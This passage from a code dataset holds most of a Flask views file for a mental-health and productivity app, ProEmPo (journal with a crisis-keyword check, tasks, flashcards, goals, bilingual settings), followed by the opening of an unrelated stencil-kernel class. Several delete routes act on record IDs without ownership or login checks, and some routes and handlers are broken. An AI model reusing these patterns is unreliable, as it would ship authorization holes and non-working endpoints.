selected_entry = entry_for_today\n\n\n if request.method == 'POST':\n if is_entry_exists_for_today():\n flash('Entry already exists for today. Cannot check-in again today.', category='error')\n else:\n\n #Handle form submission\n date = datetime.now().date()\n dear_journal_content = request.form.get('dear_journal_content')\n grateful_contents = [request.form.get('grateful1'), request.form.get('grateful2'), request.form.get('grateful3')]\n day_rating = request.form.get('day_rating')\n\n \n\n #Create a new journal entry\n journal_entry = Journal(\n date=date,\n user_id=current_user.id,\n dear_journal_content=dear_journal_content,\n grateful_content=','.join(grateful_contents),\n day_rating=day_rating\n )\n \n db.session.add(journal_entry)\n db.session.commit()\n \n list = [\"suicide\", \"murder\", \"kill\", \"hurt\", \"die\", \"Suicide\", \"Murder\", \"Kill\", \"Hurt\", \"Die\"]\n if any(word in dear_journal_content for word in list):\n db.session.commit()\n flash('Your journal may contain thoughts that may harm yourself or others.', category='error')\n flash('Help is out there. Call 988 or chat online. https://988lifeline.org/chat/', category='error')\n elif any(word in grateful_contents for word in list):\n db.session.commit()\n flash('Your journal may contain thoughts that may harm yourself or others.', category='error')\n flash('Help is out there. Call 988 or chat online. https://988lifeline.org/chat/', category='error')\n return redirect(url_for('views.journal'))\n elif request.method == 'GET':\n previous_entries = Journal.query.filter(Journal.user_id == current_user.id).all()\n\n previous_entry_id = request.args.get('previous_entry')\n\n if previous_entry_id:\n selected_entry = Journal.query.get(previous_entry_id)\n date = (datetime.now().date())\n \n return render_template('journal.html', user=current_user, journalTitle=journalTitle, journalSelect=journalSelect, \n journalChoose=journalChoose, journalButton=journalButton, journalDate=journalDate, dearJournal=dearJournal, \n journalContent=journalContent, gratefulContent=gratefulContent, dayTitle=dayTitle, rating_excellent=rating_excellent, \n rating_good=rating_good, rating_bad=rating_bad, rating_horrible=rating_horrible, saveJournal=saveJournal, \n journalFooter=journalFooter, previous_entries=previous_entries, selected_entry=selected_entry, date=date)\n'''\n@views.route('/scanJournal', methods=['POST'])\n@login_required\ndef scan_Journal():\n journal_entry = Journal.query.filter(Journal.date == today, Journal.user_id == current_user.id).first()\n list = [\"suicide\", \"murder\", \"kill\", \"hurt\"]\n if is_entry_exists_for_today():\n if any(word in journal_entry for word in list):\n db.session.commit()\n return flash('Your journal contained concerning words. What is hurting you?', category='error')\n return jsonify({})\n'''\ndef is_entry_exists_for_today():\n today = date.today()\n\n entry_for_today = Journal.query.filter(Journal.date == today, Journal.user_id == current_user.id).first()\n\n return entry_for_today is not None\n\n\n@views.route('/delete-task', methods=['POST'])\ndef delete_task(): \n task_data = json.loads(request.data)\n task_id = task_data['taskId']\n\n task = Task.query.get(task_id)\n\n if task and task.user_id == current_user.id:\n # Create a archived with the same data and due date as the original task\n archivedtask = ArchivedTask(data=task.data, user_id=current_user.id, due_date=task.due_date, due_time=task.due_time, date=task.date, was_completed=0)\n\n # Add and commit changes to the database\n db.session.add(archivedtask)\n db.session.delete(task)\n db.session.commit()\n\n return jsonify({})\n\n@views.route('/delete-finished-task', methods=['POST'])\ndef delete_finished_task(): \n task_data = json.loads(request.data)\n finished_task_id = task_data['finishedTaskId']\n\n finished_task = FinishedTask.query.get(finished_task_id)\n\n if finished_task and finished_task.user_id == current_user.id:\n # Create a Task with the same data and due date as the FinishedTask\n archivedtask = ArchivedTask(data=finished_task.data, user_id=current_user.id, due_date=finished_task.due_date, due_time=finished_task.due_time, date=finished_task.date, was_completed=1)\n\n # Add and commit changes to the database\n db.session.add(archivedtask)\n db.session.delete(finished_task)\n db.session.commit()\n\n return jsonify({})\n\n@views.route('/delete-archived-task', methods=['POST'])\ndef delete_archivedtask(): \n archivedtask_data = json.loads(request.data)\n archivedTaskId = archivedtask_data['archivedTaskId']\n archivedtask = ArchivedTask.query.get(archivedTaskId)\n\n if archivedtask and archivedtask.user_id == current_user.id:\n db.session.delete(archivedtask)\n db.session.commit()\n\n return jsonify({})\n\n\n@views.route('/mark-task', methods=['POST'])\n@login_required\ndef mark_task():\n task_data = json.loads(request.data)\n task_id = task_data['taskId']\n\n task = Task.query.get(task_id)\n\n if task and task.user_id == current_user.id:\n # Create a FinishedTask with the same data and due date as the original task\n finished_task = FinishedTask(data=task.data, user_id=current_user.id, due_date=task.due_date, due_time=task.due_time, date=task.date)\n\n # Add and commit changes to the database\n db.session.add(finished_task)\n db.session.delete(task)\n db.session.commit()\n\n return jsonify({})\n\n@views.route('/star-task', methods=['POST'])\n@login_required\ndef star_task():\n task_data = json.loads(request.data)\n task_id = task_data['taskId']\n\n task = Task.query.get(task_id)\n\n if task and task.user_id == current_user.id:\n # Toggle the starred status\n task.starred = 1 if task.starred != 1 else 0\n db.session.commit()\n\n return jsonify({})\n\n@views.route('/unmark-task', methods=['POST'])\n@login_required\ndef unmark_task():\n task_data = json.loads(request.data)\n finished_task_id = task_data['finishedTaskId']\n\n finished_task = FinishedTask.query.get(finished_task_id)\n\n if finished_task and finished_task.user_id == current_user.id:\n # Create a Task with the same data and due date as the FinishedTask\n task = Task(data=finished_task.data, user_id=current_user.id, due_date=finished_task.due_date, due_time=finished_task.due_time, date=finished_task.date)\n\n # Add and commit changes to the database\n db.session.add(task)\n db.session.delete(finished_task)\n db.session.commit()\n\n return jsonify({})\n\n\n@views.route('/return-task', methods=['POST'])\n@login_required\ndef return_task():\n task_data = json.loads(request.data)\n archived_task_id = task_data['archivedTaskId']\n\n archived_task = ArchivedTask.query.get(archived_task_id)\n\n if archived_task and archived_task.user_id == current_user.id and archived_task.was_completed == 0:\n # Create a Task with the same data and due date as the FinishedTask\n task = Task(data=archived_task.data, user_id=current_user.id, due_date=archived_task.due_date, due_time=archived_task.due_time, date=archived_task.date)\n\n # Add and commit changes to the database\n db.session.add(task)\n db.session.delete(archived_task)\n db.session.commit()\n\n elif archived_task and archived_task.user_id == current_user.id and archived_task.was_completed == 1:\n finished_task = FinishedTask(data=archived_task.data, user_id=current_user.id, due_date=archived_task.due_date, due_time=archived_task.due_time, date=archived_task.date)\n\n # Add and commit changes to the database\n db.session.add(finished_task)\n db.session.delete(archived_task)\n db.session.commit()\n\n\n return jsonify({})\n\n'''\n@views.route('/archive-task', methods=['POST'])\n@login_required\ndef archive_task():\n task_data = json.loads(request.data)\n task_id = task_data['taskId']\n\n task = Task.query.get(task_id)\n\n if task and task.user_id == current_user.id:\n # Create an ArchivedTask with the same data, date, and due date as the original task\n archivedtask = ArchivedTask(data=task.data, user_id=current_user.id, due_date=task.due_date, date=task.date)\n\n # Delete the original task\n db.session.delete(task)\n db.session.commit()\n\n return jsonify({})\n'''\n@views.route('/About')\n@login_required\ndef about():\n if current_user.language == \"ro\":\n about = \"Despre Noi\"\n aboutDescription1 = \"Bine ati venit pe site-ul nostru! Misiunea noastră este să vă facem experiența online cât mai plăcută și informativă posibil cu privire la diferitele opțiuni de sănătate mintală și productivitate disponibile aici. Vă întrebați ce este ProEmPo? Ei bine, ai venit în locul potrivit! ProEmPo este un site web de sănătate mintală și productivitate conceput pentru a promova bunăstarea mintală, pentru a crește gradul de conștientizare cu privire la problemele de sănătate mintală și pentru a oferi resurse și sprijin. De asemenea, oferim resurse productive pentru cei care au nevoie să rămână concentrați pe îndeplinirea sarcinilor.\"\n aboutDescription2 = \"Echipa noastră este pasionată de furnizarea de conținut de înaltă calitate, care să răspundă nevoilor dumneavoastră. Lucrăm în mod constant pentru a îmbunătăți și extinde eforturile noastre pentru a ne asigura că aveți acces la cele mai relevante și interesante informații disponibile.\"\n aboutDescription3 = \"Vă mulțumim că ați vizitat site-ul nostru web și sperăm că îl găsiți util și captivant. Dacă aveți întrebări sau feedback, vă rugăm să nu ezitați \"\n contact = \"contactaţi-ne\"\n aboutDescription4 = \"Apreciem contribuția dvs. și așteptăm cu nerăbdare să auzim de la dvs.\"\n else:\n about = \"About Us\"\n aboutDescription1 = \"Welcome to our website! Our mission is to make your online experience as enjoyable and informative as possible on various mental health and productivity options available here. Are you wondering about what ProEmPo is? Well you came to the right place! ProEmPo is a mental health and productivity website designed to promote mental well-being, raise awareness about mental health issues, and provide resources and support. We also provide productive resources for those in need to stay focused on doing tasks.\"\n aboutDescription2 = \"Our team is passionate about delivering high-quality content that meets your needs. We are constantly working to improve and expand our efforts to ensure that you have access to the most relevant and interesting information available.\"\n aboutDescription3 = \"Thank you for visiting our website, and we hope you find it helpful and engaging. If you have any questions or feedback, please don't hesitate to \"\n contact = \"contact us\"\n aboutDescription4 = \"We value your input and look forward to hearing from you.\"\n return render_template(\"About.html\", user=current_user, about=about, aboutDescription1=aboutDescription1, aboutDescription2=aboutDescription2, aboutDescription3=aboutDescription3, contact=contact, aboutDescription4=aboutDescription4)\n\n@views.route('/settings')\n@login_required\ndef setting():\n \n if current_user.language == \"ro\":\n selectLanguage = \"Selectați limba preferată:\"\n title = \"Setări\"\n save = \"Salvează \"\n Categories = \"Categorii\"\n General = \"General\"\n Accessibility = \"Accesibilitate\"\n changeuser = \"Schimbă Utilizator\"\n username = \"Utilizator:\"\n changepass = \"Schimbare Parolă\"\n currentpass = \"Parolă Curentă\"\n newpass = \"Parolă Nouă\"\n confirmnewpass = \"Confirmare Parolă Nouă\"\n hidefeatures = \"Ascundeți Caracteristici\"\n selfhelp = \"Ajoutor Personal\"\n tasks = \"Sarcini\"\n dailycheckin = \"Verificare Zilnică\"\n reports = \"Rapoarte\"\n language = \"Limba\"\n oldesttonewest = \"Cel mai vechi la cel mai nou\"\n newesttooldest = \"Cel mai nou la cel mai vechi\"\n duedate = \"Data scadentă\"\n alphabetically = \"Alfabetic\"\n defaultsort = \"Sortare Implicită\"\n taskpage = \"Pagina de Sarcini\"\n starredAtTop = \"Afișați Sarcinile Cu Stea În Partea De Sus\"\n makeAllButtonsPurple = \"Faceți Toate Butoanele Violet\"\n player = \"Zgomot Alb\"\n homepage = \"Pagina Principală\"\n hidesecondhand = \"Ascunde Mâna a Doua\"\n hidequote = \"Ascunde Citatul Zilei\"\n else:\n selectLanguage = \"Select your preferred language:\"\n title = \"Settings\"\n save = \"Save\"\n Categories = \"Categories\"\n General = \"General\"\n Accessibility = \"Accessibility\"\n changeuser = \"Change Username\"\n username = \"Username:\"\n changepass = \"Change Password\"\n currentpass = \"Current Password\"\n newpass = \"New Password\"\n confirmnewpass = \"Confirm New Password\"\n hidefeatures = \"Hide Features\"\n selfhelp = \"Self Help\"\n tasks = \"Tasks\"\n dailycheckin = \"Daily Check-In\"\n reports = \"Reports\"\n language = \"Language\"\n oldesttonewest = \"Oldest to Newest\"\n newesttooldest = \"Newest to Oldest\"\n duedate = \"Due Date\"\n alphabetically = \"Alphabetically\"\n defaultsort = \"Default Sort\"\n taskpage = \"Task Page\"\n starredAtTop = \"Show Starred Tasks at Top\"\n makeAllButtonsPurple = \"Make All Buttons Purple\"\n player = \"Noise Player\"\n homepage = \"Home Page\"\n hidesecondhand = \"Hide Second Hand\"\n hidequote = \"Hide Quote of the Day\"\n return render_template(\"settings.html\",user=current_user, hidequote=hidequote,\n selectLanguage=selectLanguage, title=title, save=save, Categories=Categories, General=General, Accessibility=Accessibility,\n changepass=changepass, currentpass=currentpass, newpass=newpass, confirmnewpass=confirmnewpass, \n selfhelp=selfhelp, tasks=tasks, dailycheckin=dailycheckin, reports=reports, hidefeatures=hidefeatures,\n language=language, changeuser=changeuser, username=username, oldesttonewest=oldesttonewest, \n newesttooldest=newesttooldest, duedate=duedate, alphabetically=alphabetically, taskpage=taskpage, defaultsort=defaultsort, \n starredAtTop=starredAtTop, makeAllButtonsPurple=makeAllButtonsPurple, player=player, homepage=homepage, hidesecondhand=hidesecondhand)\n\n\n@views.route('/update_starred_at_top', methods=['POST'])\n@login_required\ndef update_starred_at_top():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.starred_at_top = new_value\n db.session.commit()\n\n@views.route('/update_make_all_buttons_purple', methods=['POST'])\n@login_required\ndef update_make_all_buttons_purple():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.make_all_buttons_purple = new_value\n db.session.commit()\n\n@views.route('/update_hide_self_help', methods=['POST'])\n@login_required\ndef update_hide_self_help():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.hide_self_help = new_value\n db.session.commit()\n\n@views.route('/update_hide_quote', methods=['POST'])\n@login_required\ndef update_hide_quote():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.hide_quote = new_value\n db.session.commit()\n\n@views.route('/update_hide_second_hand', methods=['POST'])\n@login_required\ndef update_hide_second_hand():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.hide_second_hand = new_value\n db.session.commit()\n\n@views.route('/update_hide_player', methods=['POST'])\n@login_required\ndef update_hide_player():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.hide_player = new_value\n db.session.commit()\n\n@views.route('/update_hide_tasks', methods=['POST'])\n@login_required\ndef update_hide_tasks():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.hide_tasks = new_value\n db.session.commit()\n\n\n@views.route('/update_hide_journal', methods=['POST'])\n@login_required\ndef update_hide_journal():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.hide_journal = new_value\n db.session.commit()\n\n\n@views.route('/update_hide_reports', methods=['POST'])\n@login_required\ndef update_hide_reports():\n user = current_user\n data = request.get_json()\n new_value = data.get('value')\n user.hide_reports = new_value\n db.session.commit()\n\n\n@views.route('/update_language', methods=['POST'])\n@login_required\ndef update_language():\n user = current_user\n data = request.get_json()\n new_language = data.get('language')\n user.language = new_language\n db.session.commit()\n\n@views.route('/update_defaultsort', methods=['POST'])\n@login_required\ndef update_defaultsort():\n user = current_user\n data = request.get_json()\n new_defaultsort = data.get('defaultsort')\n user.defaultsort = new_defaultsort\n db.session.commit()\n\n\n@views.route('/General')\n@login_required\ndef general():\n\n\n return render_template(\"General.html\", user=current_user)\n\n@views.route('/Accessibility')\n@login_required\ndef accessibility():\n return render_template(\"Accessibility.html\", user=current_user)\n\n\n@views.route('/Support', methods=['GET'])\ndef support():\n if current_user.language == \"ro\":\n supportTitle = \"Asistență\"\n\n else:\n supportTitle = \"Support\"\n support = Support.query.all()\n return render_template(\"Support.html\", user=current_user, supportTitle=supportTitle, support=support)\n\n@views.route('/submit_support', methods=['GET','POST'])\ndef submit_support_form():\n\n support_entries = []\n\n if request.method == 'POST':\n try:\n # Get form data\n new_title = request.form['issue_title']\n new_email = request.form['email']\n new_description = request.form['description']\n if current_user.id != None:\n new_form= Support(user_id=current_user.username,issue_title=new_title, email=new_email,description=new_description)\n else:\n new_form= Support(user_id=\"No User\",issue_title=new_title, email=new_email,description=new_description)\n \n \n db.session.add(new_form)\n db.session.commit()\n \n return render_template('/thank_you.html', user=current_user)\n except Exception as e:\n print(\"An error occurred while saving the support submission:\", e)\n # Handle the error, log it, or take appropriate action\n flash('Failed to submit the support request', category='error')\n\n return render_template(\"Support.html\", support_entries=support_entries, user=current_user)\n\n\n\n\n@views.route('/ViewFlashcards', methods=[\"GET\", \"POST\"])\n@login_required\ndef show_flashcard():\n #gets all the cards from the selected user\n lesson_alias = aliased(Lesson)\n user_flashcards = (Card.query.join(lesson_alias).filter(lesson_alias.user_id == current_user.id))\n\n selected_lesson_id=request.args.get(\"lesson\")\n#gets the leasson associated with the card\n if request.method == 'POST':\n selected_lesson_id = request.form.get('lesson')\n if selected_lesson_id and selected_lesson_id != \"all\":\n user_flashcards=user_flashcards.filter(Card.lesson_id == selected_lesson_id)\n#lists out all the cards\n user_flashcards=user_flashcards.all()\n#filters all the available lessons by the user\n all_lessons=Lesson.query.filter_by(user_id=current_user.id)\n return render_template(\"viewFlashcards.html\", user=current_user, cards=user_flashcards, all_lessons=all_lessons, select_lesson=selected_lesson_id)\n\n\n@views.route('/CreateFlashcards', methods=[\"GET\", \"POST\"])\n@login_required\ndef new_flashcard():\n # gets all the lessons from the user\n \n if request.method == \"GET\":\n all_lessons=current_user.lessons\n return render_template(\"createFlashcards.html\", all_lessons=all_lessons, user=current_user)\n else:\n #Get the data from the form\n lesson_id=request.form[\"lesson\"]\n question=request.form[\"question\"]\n answer=request.form[\"answer\"]\n new_lesson_name=request.form[\"new_lesson_name\"]\n\n if lesson_id:\n # Gets the selected lesson from the user\n selected_lesson=Lesson.query.get(lesson_id)\n if not selected_lesson or selected_lesson.user_id != current_user.id:\n print(\"The selected lesson doesnt exist.\")\n return redirect(\"/CreateFlashcards\")\n elif new_lesson_name:\n #Create a new lesson if needed\n new_lesson=Lesson(name=new_lesson_name, user_id=current_user.id)\n db.session.add(new_lesson)\n db.session.commit()\n selected_lesson=new_lesson\n else:\n print(\"no lesson provided\")\n return redirect(\"/CreateFlashcards\")\n \n card=Card(question=question, lesson_id=selected_lesson.id, answer=answer)\n db.session.add(card)\n db.session.commit()\n\n return redirect(\"/CreateFlashcards\")\n\n@views.route('/DeleteFlashcard/', methods=[\"POST\"])\n@login_required\ndef delete_flashcard(flashcard_id):\n\n flashcard=Card.query.get(flashcard_id)\n\n db.session.delete(flashcard)\n db.session.commit()\n\n return redirect(\"/ViewFlashcards\")\n\n\n@views.route('/ViewFlashcards/')\n@login_required\ndef get_flashcard(flashcard_id):\n\n flashcard_id=request.view_args.get('flashcard_id')\n\n if flashcard_id is None:\n return \"Invalid request\"\n\n flashcard=Card.query.get(flashcard_id)\n\n if not flashcard:\n print('Flashcard not found')\n return redirect('/ViewFlashcards')\n \n return render_template(\"showFlashcard.html\", card=flashcard, user=current_user)\n\n\n\n@views.route('/EditFlashcard/', methods=[\"GET\", \"POST\"])\n@login_required\ndef edit_flashcard(flashcard_id):\n\n flashcard = Card.query.get(flashcard_id)\n\n if flashcard is None:\n flash(\"Flashcard not found\", \"error\")\n return redirect('/ViewFlashcards')\n\n if request.method == \"POST\":\n #get the new values and store them\n lesson_id = request.form.get(\"lesson\")\n question = request.form.get(\"question\")\n answer = request.form.get(\"answer\")\n\n #new flashcard values assigned \n flashcard.lesson_id = lesson_id\n flashcard.question = question\n flashcard.answer = answer\n\n db.session.commit()\n return redirect('/ViewFlashcards/' + str(flashcard_id))\n \n lessons = Lesson.query.filter_by(user_id=current_user.id).all()\n return render_template(\"editFlashcards.html\", card=flashcard, lessons=lessons, user=current_user)\n\n@views.route('/clear-all-completed-tasks', methods=['POST'])\n@login_required\ndef clear_all_completed_tasks():\n completed_tasks = FinishedTask.query.filter_by(user_id=current_user.id).all()\n\n for task in completed_tasks:\n archived_task = ArchivedTask(\n data=task.data,\n user_id=current_user.id,\n due_date=task.due_date,\n due_time=task.due_time,\n date=task.date,\n was_completed=1\n )\n\n db.session.add(archived_task)\n db.session.delete(task)\n\n db.session.commit()\n\n return jsonify({})\n\n\n\n@views.route('/player')\ndef player():\n playIcon=''\n pauseIcon=''\n\n if current_user.language == \"ro\":\n whitenoise = \"Zgomot Alb\"\n birdnoise = \"Zgomot de Păsări\"\n naturenoise = \"Zgomotul Naturii\"\n rainnoise = \"Zgomot de Ploaie\"\n oceannoise = \"Zgomot Ocean\"\n streamnoise = \"Zgomot de Râu\"\n underwaternoise = \"Zgomot Subacvatic\"\n timeplayingnoises = \"Timpul de Redare:\"\n else:\n whitenoise = \"White Noise\"\n birdnoise = \"Bird Noise\"\n naturenoise = \"Nature Noise\"\n rainnoise = \"Rain Noise\"\n oceannoise = \"Ocean Noise\"\n streamnoise = \"Stream Noise\"\n underwaternoise = \"Underwater Noise\"\n timeplayingnoises = \"Time Playing Noises:\"\n\n return render_template('player.html', user=current_user, playIcon=playIcon, pauseIcon=pauseIcon, whitenoise=whitenoise, birdnoise=birdnoise, naturenoise=naturenoise, rainnoise=rainnoise, oceannoise=oceannoise, streamnoise=streamnoise, underwaternoise=underwaternoise, timeplayingnoises=timeplayingnoises)\n\n\n\n\n@views.route('/goals')\n@login_required\ndef goals():\n user_id = current_user.id\n previous_goals = Goal.query.filter_by(user_id=user_id).all()\n if previous_goals is None:\n previous_goals = [] \n\n if current_user.language == \"ro\":\n mygoals=\"Obiectivele Mele\"\n specific = \"Specific\"\n measurable = \"Măsurabil\"\n achievable=\"Realizabil\"\n relevant=\"Relevant\"\n timely=\"Oportun\"\n specificQ=\"Ce obiectiv voi realiza?\"\n measurableQ=\"Cum o să ştiu că am realizat obiectivul?\"\n achievableQ=\"Obiectivul este realist?\"\n relevantQ=\"De ce este obiectul acesta important?\"\n timelyQ=\"Când voi realiza acest obiectiv?\"\n saveGoal=\"Salvează obiectivul\"\n goalCompleted=\"Obiectiv Terminat\"\n seeAllGoals=\"Vizualizează toate obiectivele\"\n explanation1=\"Când vine vorba de stabilirea obiectivelor, Proempo adoptă abordarea 'smart' a obiectivelor. Abordarea obiectivelor SMART este un cadru profesional de stabilire a obiectivelor cu cinci componente esențiale:\"\n explanation2=\"Specific: Obiectivele trebuie să fie clare și bine definite\"\n explanation3=\"Măsurabile: obiectivele ar trebui să fie cuantificabile\"\n explanation4=\"Realizabil: Obiectivele ar trebui să fie realiste\"\n explanation5=\"Relevant: Obiectivele ar trebui să se alinieze cu obiectivele și valorile dumneavoastră.\"\n explanation6=\"Oportune: obiectivele ar trebui să aibă un interval de timp definit\"\n explanation7=\"Acest cadru îmbunătățește precizia și eficacitatea stabilirii obiectivelor.\"\n answerhere = \"Răspunde aici\"\n goalsAll = \"Toate Golurile\"\n else:\n mygoals=\"My Goals\"\n specific = \"Specific\"\n measurable = \"Measurable\"\n achievable=\"Achievable\"\n relevant=\"Relevant\"\n timely=\"Timely\"\n specificQ=\"What goal will I accomplish?\"\n measurableQ=\"How do I know when I reach this goal?\"\n achievableQ=\"Is this goal realistic with commitment?\"\n relevantQ=\"Why is this goal significant to me?\"\n timelyQ=\"When will I achieve this goal?\"\n saveGoal=\"Save My Goal\"\n goalCompleted=\"Goal Completed\"\n seeAllGoals=\"See all goals\"\n explanation1=\"When it comes to goal-setting, Proempo adopts the 'smart' goal approach. The SMART goal approach is a professional goal-setting framework with five essential components:\"\n explanation2=\"Specific: Goals must be clear and well-defined.\"\n explanation3=\"Measurable: Goals should be quantifiable and trackable.\"\n explanation4=\"Achievable: Goals should be realistic and attainable.\"\n explanation5=\"Relevant: Goals should align with your objectives and values.\"\n explanation6=\" Timely: Goals should have a defined time frame.\"\n explanation7=\"This framework enhances goal-setting precision and effectiveness.\"\n answerhere = \"Answer here\"\n goalsAll = \"All Goals\"\n return render_template('goals.html', user=current_user, previous_goals=previous_goals, \n mygoals=mygoals, specific=specific, measurable=measurable, achievable=achievable, relevant=relevant, \n timely=timely, specificQ=specificQ, measurableQ=measurableQ, achievableQ=achievableQ, relevantQ=relevantQ,\n timelyQ=timelyQ, saveGoal=saveGoal, goalCompleted=goalCompleted, seeAllGoals=seeAllGoals, \n explanation6=explanation6, explanation1=explanation1, explanation2=explanation2, \n explanation3=explanation3, explanation4=explanation4, explanation5 = explanation5, \n explanation7 = explanation7, answerhere=answerhere, goalsAll=goalsAll)\n\n\n\n@views.route('/save_goal', methods=['POST'])\ndef save_goal():\n try:\n data = request.json\n user_id = current_user.id\n specific = data.get('specific')\n measurable = data.get('measurable')\n achievable = data.get('achievable')\n relevant = data.get('relevant')\n timely = data.get('timely')\n status = data.get('status')\n\n goal_entry = Goal(\n user_id=user_id,\n specific=specific,\n measurable=measurable,\n achievable=achievable,\n relevant=relevant,\n timely=timely,\n status=status\n )\n\n db.session.add(goal_entry)\n db.session.commit()\n\n return jsonify({'message': 'Goal entry saved successfully'})\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Failed to save goal entry'}), 500\n\n\n@views.route('/complete_goal/', methods=['PUT'])\ndef complete_goal(goal_id):\n try:\n goal = Goal.query.filter_by(id=goal_id, user_id=current_user.id).first()\n\n if goal:\n goal.status = \"C\"\n db.session.commit()\n return jsonify({'message': 'Goal marked as completed successfully'})\n else:\n return jsonify({'message': 'Goal not found or does not belong to the current user'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Failed to mark goal as completed'}), 500\n \n\n\n@views.route('/fetch_goals', methods=['GET'])\n@login_required\ndef fetch_goals():\n user_id = current_user.id\n goals = Goal.query.filter_by(user_id=user_id).all()\n\n # Serialize the goals to JSON\n serialized_goals = []\n for goal in goals:\n serialized_goal = {\n 'id': goal.id,\n 'specific': goal.specific,\n 'measurable': goal.measurable,\n 'achievable': goal.achievable,\n 'relevant': goal.relevant,\n 'timely': goal.timely,\n 'status': goal.status\n }\n serialized_goals.append(serialized_goal)\n\n return jsonify({'goals': serialized_goals})\n\n\ndef get_iso_year_week(date):\n year, week, _ = date.isocalendar()\n return year, week\n\n@views.route('/accomplishments', methods=['GET', 'POST'])\n@login_required\ndef pride():\n if current_user.language == \"ro\":\n accomplishmentsTitle = \"Realizări\"\n accomplishmentsDescription1 = \"Fă-ți timp pentru a reflecta asupra realizărilor și calităților care te fac să fii mândru de tine.\"\n accomplishmentsDescription2 = \"Îmbrățișarea călătoriei tale este un proces unic și continuu, unul care se referă la tine.\"\n accomplishmentsDescription3 = \"Enumerați mai jos până la 5 calități de care sunteți mândru și reveniți pe această pagină când vă simțiți dezamăgiți.\"\n accomplishmentsDescription4 = \"Ține minte: ești capabil de lucruri minunate.\"\n accomplishmentsQuestion = \"De ce esti mandru?\"\n saveAccomplishments = \"Salvați\"\n proud = \"Sunt mândru de...\"\n placeholder = \"Enumerați aici de ce sunteți mândru...\"\n accomplishmentsWarning = \"Sigur vrei să ștergi această postare?\"\n else:\n accomplishmentsTitle = \"Accomplishments\"\n accomplishmentsDescription1 = \"Take some time to reflect on the accomplishments and qualities that make you proud of yourself.\"\n accomplishmentsDescription2 = \"Embracing your journey is a unique and ongoing process, one that's all about you.\"\n accomplishmentsDescription3 = \"List up to 5 qualities that you are proud of below and come back to this page when you are feeling down.\"\n accomplishmentsDescription4 = \"Remember: you are capable of wonderful things.\"\n accomplishmentsQuestion = \"What are you proud of?\"\n saveAccomplishments = \"Save\"\n proud = \"I am proud of...\"\n placeholder = \"List what you are proud of here...\"\n accomplishmentsWarning = \"Are you sure you want to delete this post?\"\n current_year, current_week_number = get_iso_year_week(today)\n\n recent_accomplishments = Pride.query.filter(\n Pride.user_id == current_user.id,\n Pride.year == current_year,\n Pride.week_number == current_week_number,\n Pride.status == False\n ).all()\n\n\n for accomplishment in recent_accomplishments:\n #Update the status once it lands outside the current week\n if current_week_number - accomplishment.week_number > 0:\n accomplishment.status = True \n \n if request.method == 'POST':\n #max entries for the week check\n maximum_entries = 5\n entries_for_week = len(recent_accomplishments)\n\n if entries_for_week >= maximum_entries:\n flash(\"You have entered the maximum number of entries. Only 5 per week\")\n else:\n new_moment = request.form.get('moment')\n pride_entry = Pride(\n user_id=current_user.id,\n moment=new_moment,\n year=current_year,\n week_number=current_week_number,\n status=False,\n )\n\n db.session.add(pride_entry)\n db.session.commit()\n \n recent_accomplishments = Pride.query.filter(\n Pride.user_id == current_user.id,\n Pride.year == current_year,\n Pride.week_number == current_week_number,\n Pride.status == False\n ).all()\n \n return render_template('pride.html', recent_accomplishments=recent_accomplishments, \n user=current_user, accomplishmentsTitle=accomplishmentsTitle, \n accomplishmentsDescription1=accomplishmentsDescription1, accomplishmentsDescription2=accomplishmentsDescription2,\n accomplishmentsDescription3=accomplishmentsDescription3, accomplishmentsDescription4=accomplishmentsDescription4,\n accomplishmentsQuestion=accomplishmentsQuestion, saveAccomplishments=saveAccomplishments, proud=proud, \n placeholder=placeholder, accomplishmentsWarning=accomplishmentsWarning)\n \n\n@views.route('/DeletePride/', methods=[\"POST\"])\n@login_required\ndef delete_pride(pride_id):\n\n moment=Pride.query.get(pride_id)\n db.session.delete(moment)\n db.session.commit()\n \n return redirect(url_for('views.pride'))\n \n@views.route('/past-accomplishments', methods=['GET', 'POST'])\n@login_required\ndef past_week_accomplishments():\n\n error_message = \"\"\n\n past_accomplishments = Pride.query.filter(\n Pride.user_id == current_user.id,\n Pride.status == True\n ).order_by(Pride.date.desc()).limit(5).all()\n\n if not past_accomplishments:\n error_message = \"You havent listed any accomplishments in the past week\"\n\n return render_template('pastAccomplishments.html', past_accomplishments=past_accomplishments,error_message=error_message, user=current_user)","repo_name":"sategf/proempo-fl","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":77192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31143387207","text":"#!/usr/bin/env python3\n\n\"\"\"\n The Kernel class is a subclass of the BaseKernelNodeClass and represents the actual kernel node in the\n KernelChainGraph. This class is able to read from predecessors, process it according to the stencil expression\n and write the result to the successor channels. In addition it analyses the buffer sizes and latencies of the\n computation according to the defined latencies.\n\"\"\"\n\n__author__ = \"Andreas Kuster (kustera@ethz.ch)\"\n__copyright__ = \"BSD 3-Clause License\"\n\nimport functools\nimport operator\nfrom typing import List, Dict\n\nimport dace.dtypes\n\nimport stencilflow\nfrom stencilflow.base_node_class import BaseKernelNodeClass, BaseOperationNodeClass\nfrom stencilflow.bounded_queue import BoundedQueue\nfrom stencilflow.calculator import Calculator\nfrom stencilflow.compute_graph import ComputeGraph\nfrom stencilflow.compute_graph import Name, Num, BinOp, Call, Output, Subscript, Ternary, Compare, UnaryOp\n\n\nclass Kernel(BaseKernelNodeClass):\n\n def __init__(self,\n name: str,\n kernel_string: str,\n dimensions: List[int],\n data_type: dace.dtypes.typeclass,\n boundary_conditions: Dict[str, Dict[str, str]],\n raw_inputs,\n vectorization: int = 1,\n plot_graph: bool = False,\n verbose: bool = False) -> None:\n \"\"\"\n\n :param name: name of the kernel\n :param kernel_string: mathematical expression representing the stencil computation\n :param dimensions: global dimensions / problem size (i.e. size of the input array\n :param data_type: data type of the result produced by this kernel\n :param boundary_conditions: dictionary of the boundary condition for each input channel/field\n :param plot_graph: flag indicating whether the underlying graph is being drawn\n :param verbose: flag for console output logging\n \"\"\"\n # initialize the superclass\n 